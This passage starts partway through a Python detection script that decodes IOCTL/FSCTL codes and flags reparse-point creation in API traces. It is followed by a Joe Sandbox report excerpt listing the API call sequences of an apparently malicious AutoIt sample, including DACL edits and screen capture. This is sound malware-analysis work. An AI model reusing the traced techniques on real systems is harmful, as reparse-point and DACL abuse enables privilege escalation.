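METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
# FSCTL function numbers that matter when hunting for reparse-point abuse.
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}


def parse_api_line(line):
    """Return {'api', 'module', 'args', 'ref'} for one report line, or None."""
    m = API_RE.search(line)
    if not m:
        return None
    name, module, raw_args, ref = m.groups()
    # '?' marks an argument the analyzer could not resolve statically.
    args = [None if a == "?" else int(a, 16) for a in raw_args.split(",")]
    return {"api": name, "module": module, "args": args, "ref": ref}


def decode_ctl_code(code):
    """Split an IOCTL into device type (bits 16-31), access (14-15),
    function (2-13) and transfer method (0-1), mirroring the CTL_CODE macro."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    name = FSCTL_FUNCTIONS.get(function) if device == 0x09 else None
    return {"device": DEVICE_TYPES.get(device, hex(device)), "access": access,
            "function": function, "method": METHODS[method], "name": name}


def names_for_mask(value, table):
    """Expand a bit mask into the symbolic names of the bits that are set."""
    return [n for bit, n in table.items() if value & bit]


def decode_create_file(args):
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)."""
    access, _share, _sa, disposition, flags, _tmpl = args[1:7]
    return {"access": names_for_mask(access, ACCESS),
            "disposition": DISPOSITION.get(disposition, hex(disposition)),
            "flags": names_for_mask(flags, FLAGS)}


def analyze(lines):
    """Decode every CreateFileW/DeviceIoControl line and say whether the
    sequence sets a reparse point (junction/symlink creation)."""
    calls = [c for c in map(parse_api_line, lines) if c]
    decoded = []
    for c in calls:
        if c["api"] == "CreateFileW":
            decoded.append((c["api"], decode_create_file(c["args"])))
        elif c["api"] == "DeviceIoControl":
            decoded.append((c["api"], decode_ctl_code(c["args"][1])))
    sets_reparse = any(api == "DeviceIoControl" and d["name"] == "FSCTL_SET_REPARSE_POINT"
                       for api, d in decoded)
    return {"calls": decoded, "sets_reparse_point": sets_reparse}


if __name__ == "__main__":
    result = analyze(SAMPLE_LINES)
    for api, d in result["calls"]:
        print(api, d)
    print("sets reparse point:", result["sets_reparse_point"])
```

The decoder is deliberately table-light: the bit-field split in decode_ctl_code is what identifies any FSCTL or IOCTL from a trace, and the FSCTL name table only needs the few function numbers an analyst cares about. Feeding it the whole "APIs" section of a report will also surface other interesting control codes by device type and function number even when no name is known for them.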
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0095BEF4,?,?), ref: 0095E754
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E76B
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E776
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E783
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0095E78C
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E79B
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0095E7A4
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E7AB
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0095BEF4,?,?,00000000,?), ref: 0095E7BC
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097D9BC,?), ref: 0095E7D5
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0095E7E5
                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0095E809
                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0095E834
                                                                        • DeleteObject.GDI32(00000000), ref: 0095E85C
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0095E872
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: aa84ba80f7e29bd7d3beaeae59b18c9dcf60cf2c8056868b69c9e0b159233dbb
                                                                        • Instruction ID: b59aa8376b0b31707bdb8e21f3bd91b1aa6013ce96c3b0b23d18265f2cb4771d
                                                                        • Opcode Fuzzy Hash: aa84ba80f7e29bd7d3beaeae59b18c9dcf60cf2c8056868b69c9e0b159233dbb
                                                                        • Instruction Fuzzy Hash: C8415972601204EFDB15DF65DC88EAA7BB9FF89715F108058F909D7260C7319A85DB60
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 0094076F
                                                                        • _wcscat.LIBCMT ref: 00940787
                                                                        • _wcscat.LIBCMT ref: 00940799
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009407AE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009407C2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 009407DA
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 009407F4
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940806
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                        • String ID: *.*
                                                                        • API String ID: 34673085-438819550
                                                                        • Opcode ID: 7ede1683e17396572432a4d25470c31d7bd50b3a7d91040260f1d37febfc8dee
                                                                        • Instruction ID: df38a8274d1f459392837b19c1cc56996526e0ba73b3b02f7c30883ed16efa2f
                                                                        • Opcode Fuzzy Hash: 7ede1683e17396572432a4d25470c31d7bd50b3a7d91040260f1d37febfc8dee
                                                                        • Instruction Fuzzy Hash: 7681A0715043059FCB24DF24C845D6EB7E8BFC8304F158D2EFA8AC7251EA35D9948B92
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0095EF3B
                                                                        • GetFocus.USER32 ref: 0095EF4B
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0095EF56
                                                                        • _memset.LIBCMT ref: 0095F081
                                                                        • GetMenuItemInfoW.USER32 ref: 0095F0AC
                                                                        • GetMenuItemCount.USER32(00000000), ref: 0095F0CC
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0095F0DF
                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0095F113
                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0095F15B
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0095F193
                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0095F1C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1296962147-4108050209
                                                                        • Opcode ID: bd497b2347cdc09a15dd047a92c2b7ce705b4b77b858052d5f77ecb051d0fd7c
                                                                        • Instruction ID: 98dfd5836104bba5b6605c7b3aa4c547a7b9d1ad6a973830542b773073c33048
                                                                        • Opcode Fuzzy Hash: bd497b2347cdc09a15dd047a92c2b7ce705b4b77b858052d5f77ecb051d0fd7c
                                                                        • Instruction Fuzzy Hash: 32818B71509301EFD720CF16C894A6ABBE9FF88325F10092EFD9897291D731D949CB92
                                                                        APIs
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0092ABD7
                                                                          • Part of subcall function 0092ABBB: GetLastError.KERNEL32(?,0092A69F,?,?,?), ref: 0092ABE1
                                                                          • Part of subcall function 0092ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0092A69F,?,?,?), ref: 0092ABF0
                                                                          • Part of subcall function 0092ABBB: HeapAlloc.KERNEL32(00000000,?,0092A69F,?,?,?), ref: 0092ABF7
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0092AC0E
                                                                          • Part of subcall function 0092AC56: GetProcessHeap.KERNEL32(00000008,0092A6B5,00000000,00000000,?,0092A6B5,?), ref: 0092AC62
                                                                          • Part of subcall function 0092AC56: HeapAlloc.KERNEL32(00000000,?,0092A6B5,?), ref: 0092AC69
                                                                          • Part of subcall function 0092AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0092A6B5,?), ref: 0092AC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0092A8CB
                                                                        • _memset.LIBCMT ref: 0092A8E0
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092A8FF
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A910
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0092A94D
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0092A969
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A986
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0092A995
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092A99C
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092A9BD
                                                                        • CopySid.ADVAPI32(00000000), ref: 0092A9C4
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0092A9F5
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0092AA1B
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0092AA2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 2140b9088ad302afad4be9d4a33c1851c43510c67500f272a1e57205d9606ef2
                                                                        • Instruction ID: 89075f12c4a1a79f3a52dfdd4e28c599dde92ebd9f96cff56acdd1f8c0d84cc8
                                                                        • Opcode Fuzzy Hash: 2140b9088ad302afad4be9d4a33c1851c43510c67500f272a1e57205d9606ef2
                                                                        • Instruction Fuzzy Hash: 3F519F72901219AFDF00DFA0EC84EEEBBBAFF44310F048129F915A7290DB319A45DB61
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00949E36
                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00949E42
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00949E4E
                                                                        • SelectObject.GDI32(00000000,?), ref: 00949E5B
                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00949EAF
                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00949EEB
                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00949F0F
                                                                        • SelectObject.GDI32(00000006,?), ref: 00949F17
                                                                        • DeleteObject.GDI32(?), ref: 00949F20
                                                                        • DeleteDC.GDI32(00000006), ref: 00949F27
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00949F32
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        • Opcode ID: 4ef508969eba75ae6618a745e6b5d2843830913d24931a6868e8c9c5dd69e815
                                                                        • Instruction ID: 6b32f0e9ca6a2c9a2d06fbd8a255722127df6b0510e7799cc93d3414e0d32aa2
                                                                        • Opcode Fuzzy Hash: 4ef508969eba75ae6618a745e6b5d2843830913d24931a6868e8c9c5dd69e815
                                                                        • Instruction Fuzzy Hash: 7F512776904309EFCB24CFA8C885EAFBBB9EF48710F14881DF959A7250D735A941CB90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-2391861430
                                                                        • Opcode ID: 13e1569234e53033f3935e5b01687c600eac3e89de8b06e25cb104c9ac063d10
                                                                        • Instruction ID: 0dfeda9b3d14d9c337cb04f6945465d98d7877b5e2e4e565515e8d0cc80c7c62
                                                                        • Opcode Fuzzy Hash: 13e1569234e53033f3935e5b01687c600eac3e89de8b06e25cb104c9ac063d10
                                                                        • Instruction Fuzzy Hash: BD51497190050DAACB15EBA4CE46EEEB778EF04304F104165F605B21A2EB316F99DF61
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-3420473620
                                                                        • Opcode ID: bdee14b5587c5ca1f009f23fecf7cb6ddeecfbbaee8f96e14b08d8cbb3eeca92
                                                                        • Instruction ID: 7f9bb2919e6c769d3d01befb7f157dbb08d609e3245c21fa7fd159b4f190968c
                                                                        • Opcode Fuzzy Hash: bdee14b5587c5ca1f009f23fecf7cb6ddeecfbbaee8f96e14b08d8cbb3eeca92
                                                                        • Instruction Fuzzy Hash: 1C516B7190060DAACB15FBA4CE42EEEB778FF04344F104165B605B20A2EB746F99DF62
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009355D7
                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00935664
                                                                        • GetMenuItemCount.USER32(009B1708), ref: 009356ED
                                                                        • DeleteMenu.USER32(009B1708,00000005,00000000,000000F5,?,?), ref: 0093577D
                                                                        • DeleteMenu.USER32(009B1708,00000004,00000000), ref: 00935785
                                                                        • DeleteMenu.USER32(009B1708,00000006,00000000), ref: 0093578D
                                                                        • DeleteMenu.USER32(009B1708,00000003,00000000), ref: 00935795
                                                                        • GetMenuItemCount.USER32(009B1708), ref: 0093579D
                                                                        • SetMenuItemInfoW.USER32(009B1708,00000004,00000000,00000030), ref: 009357D3
                                                                        • GetCursorPos.USER32(?), ref: 009357DD
                                                                        • SetForegroundWindow.USER32(00000000), ref: 009357E6
                                                                        • TrackPopupMenuEx.USER32(009B1708,00000000,?,00000000,00000000,00000000), ref: 009357F9
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00935805
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 3993528054-0
                                                                        • Opcode ID: 7a40ffbd5ea7c157b81475086ccf2e55ffb108c7377e8bcc847a2abe386dd8eb
                                                                        • Instruction ID: 7f5f4078d5e05df114dfd018a556eb7bf62a191cd1b8020be99df9beac2c0953
                                                                        • Opcode Fuzzy Hash: 7a40ffbd5ea7c157b81475086ccf2e55ffb108c7377e8bcc847a2abe386dd8eb
                                                                        • Instruction Fuzzy Hash: CB710571645A05BFEB209F15CC4AFAABFA9FF48368F250205F519AA1E0C7716C50DF90
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        • Opcode ID: c6bad7316a08939e110735477892fc534b43a3d9c51cac6188d5da373b4bb3ca
                                                                        • Instruction ID: 9ef52df405f59070204a850edbc9e6c112991b07ed557dbc14ecbb192fd7530c
                                                                        • Opcode Fuzzy Hash: c6bad7316a08939e110735477892fc534b43a3d9c51cac6188d5da373b4bb3ca
                                                                        • Instruction Fuzzy Hash: AD413E3061024A8BDF14EF15D851AEA33B5AFA2381F109818FC955B2D2EBB19A0ACB50
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009636F4,00000010,?,Bad directive syntax error,0098DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009325D6
                                                                        • LoadStringW.USER32(00000000,?,009636F4,00000010), ref: 009325DD
                                                                        • _wprintf.LIBCMT ref: 00932610
                                                                        • __swprintf.LIBCMT ref: 00932632
                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009326A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 1080873982-4153970271
                                                                        • Opcode ID: 3c552f44e69b6120684ae97a7ff0db583f2a5e9d8988f68941e00122bb45501f
                                                                        • Instruction ID: a5808df645d4a13da36c47fae8357dddac92a23e8d5f032ed0ff7d0e808c0628
                                                                        • Opcode Fuzzy Hash: 3c552f44e69b6120684ae97a7ff0db583f2a5e9d8988f68941e00122bb45501f
                                                                        • Instruction Fuzzy Hash: F8214D3290021EBFCF11ABA0CC4AFEE7779FF59308F004455F615A60A2DA71A654DB51
                                                                        APIs
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00937B42
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00937B58
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00937B69
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00937B7B
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00937B8C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: SendString
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 890592661-1007645807
                                                                        • Opcode ID: 6284133c2ead779acb995810a61ae1e27c47e6ccf0ce47a1da0b870e9d9688b5
                                                                        • Instruction ID: f2cf340360f5b657de4e4ae3ddbca49ba6007d9ca17171b3e1cd38ae1aa8e402
                                                                        • Opcode Fuzzy Hash: 6284133c2ead779acb995810a61ae1e27c47e6ccf0ce47a1da0b870e9d9688b5
                                                                        • Instruction Fuzzy Hash: 7211BFE1A5026D79D720B7B9CC8ADFFBABCEBD2B14F0004197511A20C1EA601E44CAE1
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00937794
                                                                          • Part of subcall function 0090DC38: timeGetTime.WINMM(?,7707B400,009658AB), ref: 0090DC3C
                                                                        • Sleep.KERNEL32(0000000A), ref: 009377C0
                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009377E4
                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00937806
                                                                        • SetActiveWindow.USER32 ref: 00937825
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00937833
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00937852
                                                                        • Sleep.KERNEL32(000000FA), ref: 0093785D
                                                                        • IsWindow.USER32 ref: 00937869
                                                                        • EndDialog.USER32(00000000), ref: 0093787A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: 9e67a7e32b0bee191ca6813ecc4f9f5eb90373b8932cd945394ef654ed0c6ce6
